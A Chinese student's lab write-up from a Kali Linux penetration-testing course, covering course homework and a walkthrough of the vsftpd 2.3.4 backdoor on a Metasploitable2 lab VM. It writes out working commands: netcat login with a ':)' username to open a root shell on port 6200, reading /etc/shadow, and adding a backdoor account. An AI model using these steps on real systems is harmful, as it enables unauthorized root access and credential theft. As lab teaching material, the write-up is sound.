tataramoriko

kali渗透测试 2021-11-01

课程内容

漏洞扫描
  0day  还没有补丁的安全漏洞 

  ARP欺骗
  FTP/HTTP协议 明文传输

作业

	一、漏洞渗透测试
		1、靶机安装easy file sharing server(efssetup_2018.zip)
		2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
		3、利用该漏洞,使得靶机运行计算器。P116-119

	二、Metasploit应用
		1、生成主控端、被控端。
		2、获得靶机(Windows)控制权。
		3、下载靶机上任意一个文件。
		P121-123;140-145

		给出WalkThrough WriteUp

实验

注:本次实验仅作测试 不涉及任何资产损失 一切操作都是在内网运行 本人严格遵守法律

一.笑脸漏洞
	vsftpd v2.3.4
		在 str.c 中出现一行与程序无关的代码
	vsf_sysutil_extra(): 打开6200端口

	Metasploitable2:
		ifconfig
			192.168.220.144

image

kali:
	nmap 192.168.220.144/24
		这里的 24 理解为 255.255.255.0 子网掩码的长度

image

        nmap -p 6200 192.168.220.144
            指定端口 6200 
            扫描6200

image

开始复现漏洞
    nc 192.168.220.144 21
    user a:)    [这里末尾要是一个 :)]
    pass 11
    就成功打开了 靶机上的 6200 端口

image

    然后 nc 192.168.220.144 6200
        发现成功连接上了靶机系统
        这是开发者留的一个后门
        并且还是个大后门(root)

image

	如图所示 我们使用
	cat /etc/shadow
	查看系统的账户

image

        我们试着 添加一个账户
        adduser test4

image

	看看靶机
	cat /etc/shadow
	已经成功创建了 一个test4后门账号

image

自动化脚本
nmap --script ftp-vsftpd-backdoor 192.168.144.220

分类:

技术点:

相关文章: